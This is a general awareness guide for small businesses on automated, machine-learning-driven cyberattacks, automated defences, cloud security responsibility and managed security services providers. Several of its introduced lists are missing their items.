In this guide you will learn about:
- Automated technologies used in cyberattacks
- Automated cyber-defense technologies and processes
- Automated defense technologies and solutions
- Advanced cyberdefense capabilities
- Engaging a third-party managed security services provider
For SMB owners, reading about massive cyberattacks might seem like a faraway misfortune of international enterprise companies. Now, the tit-for-tat cybercrime war pits increasingly sophisticated malicious actors against businesses of all sizes. Attacks now involve smaller companies, SMBs, as well as solo professionals, professional practices, and remote knowledge workers.
To get the jump on security pros, cyber attackers use every tool they can lay their hands on. These include automated tools, machine learning, and robotic process automation (RPA).
All business operators—no matter how modest their operations might be—ought to recognize cyberattacks and the risks that these exploits create. Even basic awareness of network traffic patterns and behavior can add to security defenses and reduced risk of attack.
This guide is designed for solo professionals, remote corporate workers, and members of professional practices—people who run modest networks, often with modest security budgets. It describes trends in cyberattacks and the defense measures that can reduce or avoid the damage that these exploits cause.
Thinking about DIY cybersecurity measures? Or perhaps, handing off cybersecurity duties to a third-party managed security services provider (MSSP)? If so, the detailed descriptions in this guide should help you understand what you are buying—or risking.
Several years ago, cyberattacks enabled by malware named WannaCry and NotPetya captured the attention of cybercrime watchers everywhere. Designing and installing advanced cyber security strategies to combat these threats became the need of the hour. Why? Times and cybercrime were changing:
For years now, cybercriminals have tweaked malware so that security software can’t discover it or identify it as malicious. Large-scale threat intelligence efforts were launched to spot every variation of known malware and put copies of it into databases, so that each instance could be identified and neutralized.
But identifying literally millions of bits of malware is difficult, especially when they are deliberately disguised. Increasingly, security pros started using machine learning to stop familiar and new, unknown types of malware.
Knowing an effective tool when they see one, cybercriminals started using machine learning, too. Unfortunately, they adapt and deliver software that is more adaptable and sophisticated than that of legitimate developers. Now, the bad guys developed machine learning-enabled attacks and are using them against businesses and government agencies.
But this is old news. Use of automation and related technologies are familiar exploits. What makes automated cybercrime riskier for smaller-scale business operations?
A Europol report warns that artificial intelligence (AI) and other forms of automation could make cyberattacks more dangerous and more difficult to spot than ever. For example, machine learning-based malware can automatically send phishing email messages to learn what sort of language works best in cyberattacks and how to design attacks for specific types of targets.
Modern cyberattacks use several types of automation: robotic process automation, artificial intelligence, and machine learning, a specific subset of AI. Each contributes its own capabilities to finding, organizing, analyzing, and distributing huge volumes of data at lightning speeds.
This is really a process, in which software intelligently automates (outsources) boring, repetitive tasks—typically performed by humans—to mechanical devices or other software programs. RPA is important because it can delegate manual, boring tasks to bots, which can perform them without humans having to monitor or control them.
RPA role in automated cybercrime. Outsourcing tasks to non-human workers saves enormous amounts of time and money and enables many tasks that humans cannot perform. (Example: Scanning 1.2 million instances of malware in a threat intelligence database.) However, the convenience that RPA provides encourages a “set it and forget it” mentality and all its security risks.
Bots often get access to sensitive network data and systems. RPA bots use privileged access to perform tasks, moving data between systems and processes. When exploited, RPA bots provide a handy pipeline to an organization’s data. Because RPA bots need access to different applications to handle data, access credentials are often hard coded into scripts or pulled in from insecure locations. These worst practices are common sources of illegal entry into networks and data stores.
Machine learning is the umbrella term for the ability for computers to adapt, learn, and respond to changes in the environment without being specifically programmed for specific tasks.
When it comes to modern cybercrime, machine learning takes center stage with machine learning-enabled attacks (MLEA). By using machine learning, hackers can automate some or all steps in the data breach process, including:
The security trade press notes these MLEA-related trends and predictions:
Cybercriminals now use AI to scale up their social engineering attacks and make them more efficient. Some forward-looking hackers are also using AI to identify new weaknesses in networks, devices, and applications as they emerge.
By rapidly identifying opportunities for human hackers, the job of keeping information secure is made much tougher. Now, real-time monitoring of all network access and activity combined with frequent, consistent patching are vital to combat these emerging threats.
The cloud isn’t an attack technology, but it provides a new and fertile IT environment, where automated cyberattacks occur with greater and greater frequency.
Small-office business operators often assume that compromised cloud services create less disruption than more traditional on-premises services do. This mistake can lead administrators and IT ops teams to cut corners when secure cloud infrastructure is concerned.
There’s also a naïve belief that hosted service providers take responsibility for the security of client data. Cloud-hosted services still require the same level of ongoing monitoring, risk management, backups, upgrades, and maintenance as traditional IT infrastructures do.
Attacks are now so highly automated that significant damage can be done in little time. This applies to attack targets and collateral damage (compromised servers are used to stage further attacks). If it’s been a while since you reviewed your cloud resource security, now is a good time.
So, what forms do automated cyberattacks take? When researchers studied underground cybereconomies, they listed 10 of the most common automation services that hackers use. Most of these tools and services are part of active hacking campaigns.
Or they are traded in dark-web forums. Why automate? It’s the simplest, fastest, most efficient way to launch more attacks and generate larger amounts of profit.
Hackers who distribute stolen database often use automation to choose and offer the most valuable data (email addresses, payment card data, passwords, and other personal information.
But, as threat actors use automation to scale their efforts, network security defense teams are not sitting on their hands. They are using a similar approach and many of the same automated tools as the criminals.
Automation provides impressive defense capabilities to IT security professionals everywhere. Increasingly powerful; cyber-defense measures can help organizations to avoid or reduce damage of cyberattacks. And automated tools and solutions can make cyber-defense measures more efficient and effective.
It’s safe to say that high-end hackers have gone corporate. With their own research budgets, 21st-century cyber-thieves constantly improve their products. Malicious software and processes are stealthier, smarter, and more able than ever to cripple IT infrastructures.
Criminals are using cloud services and automated technology to speed up attacks, which decrease the time that enterprises get to identify and respond to a data breach or disruption attack. Security specialists constantly develop innovative ways to win much of that time back. They do it by using automated technologies to defend data and network infrastructures from harm.
Here’s the lineup of technologies that play important roles in cybersecurity defense.
Artificial intelligence/deep learning. AI plays an increasing role in cybersecurity. Data analytics tools engage in high-speed, high-volume processes to identify, gather, and analyze data from millions of cyber incidents. Results help to identify potential threats—an employee account acting strangely when someone clicks on a phishing link or a new malware variant, for example. AI now defends network cybersecurity by:
Deep learning-based tools detect threats or unwarranted activities by analyzing data such as logs, transaction data, and real-time communications.
Network behavior analysis. This technique, which targets social media and online advertisements to a carefully defined audience, also has a place in cybersecurity. When combined with machine learning methods, behavioral analytics helps security pros detect harmful patterns of system or network behavior and respond to cyberthreats in real time.
Internet-connected devices (IoT). IoT devices enable organizations to connect devices to networks and transfer data between them without human intervention. They drive automation, productivity, and efficiency, which makes them valuable in cybersecurity efforts.
Embedded authentication hardware. Embedded authenticators are emerging technologies that confirm a user’s identity. First introduced in 2016 as Intel’s sixth-generation vPro chip, this approach to hardware authenticators was claimed to offer better protection from interference and manipulation than their software equivalents.
These powerful user authentication tools are embedded into a device’s hardware. Each device uses several levels and authentication methods that work together. Now, interest and the market value for this technology are growing at a rapid pace.
Automating these IT processes give organizations remarkable improvements in their cybersecurity defenses.
Detecting malware and disruptive activity. Implementing good data governance through automated techniques limits total risk when an incident happens. However, you should want to detect and try to stop an attack before it advances.
Unfortunately, when security defenders use conventional techniques such as virus scanners, modern malware such as Sodinokibi, is hard to detect using. One reason for this difficulty is that the malware takes advantage of existing Window software such as PowerShell and other standard utilities.
Responding to attacks in real time. Machine learning-based, defensive software identifies and reacts to suspected problems almost immediately, preventing potential issues from disrupting business without relying on humans having to monitoring everything at once.
Advanced security software compares data that describes current application behavior against baseline data stored online. (This includes all aspects of a web application’s normal behavior such as directories, URLs, parameters, and acceptable user inputs.) Rules-based analysis determines if app behavior is “safe.” If the situation isn’t safe, the application blocks attacks within seconds.
With their own R&D budgets, 21st-century cyber-thieves are always improving their product, making it faster, stealthier, and smarter about detecting and deleting backups and crippling other defenses.
Finding sensitive data for millions of files, adjusting permissions, and then monitoring for threats in these enormous corporate file systems is beyond the capabilities of IT teams. That is, unless they have significant help from software automation.
Uncovering new kinds of malware isn’t the only way machine learning can boost cybersecurity. Important capabilities also include:
One important first step is to have automated data governance practices: software for efficiently scanning file systems, determining employee access patterns, and then setting permissions that limit access to those who really need it.
In addition, cyber defense software should be able to classify corporate data to find sensitive information — credit card numbers, passwords, and other account data — and lock these files down with special permissions.
The benefits of using an infrastructure as a service (IaaS) provider are obvious. There’s no need to spend money to buy and maintain expensive servers and computing power to manage your data and IT operations. And you get a general sense that your data is safe. After all, it’s in the cloud, right?
Well, maybe. Business owners: take a long look at the fine print in your service contract. Your data might not be as thoroughly protected as you think.
When you post your data in the cloud, the IaaS (cloud hosting) provider is responsible for the protection of the basic IT infrastructure that contains your data and apps. You, the business owner, are responsible for protecting your own data. Look at this graphic. (Source: Amazon Web Services)
This model clearly portrays how the customers and cloud services communicate with each other. The IaaS provider can support you by giving you secure infrastructure, bandwidth access, and disaster recovery, but it is up to you to be aware of the limitations of cloud computing and how you protect your information.
Security technical reports and white papers share a gloomy outlook for SMB owners. Small to mid-sized businesses continue to face a threat from cybercrime. And your chances of flying under the radar of cybercrooks are not good.
The recent demand for reliable security services has created one more as-a-service: the MSSP. Managed security services providers sell specialized cloud-based services to organizations of all sizes. MSSPs support some or all aspects of their clients’ security functions, which typically include some level of:
Before you groan, “But I can’t afford that!” consider this: In terms of time, money, and on-premises talent, can you afford to:
If you answer “no” to any of these questions, we understand. But ultimately, it all comes down to judging the costs of ongoing security support services versus the expected value of Something Going Terribly Wrong at your business.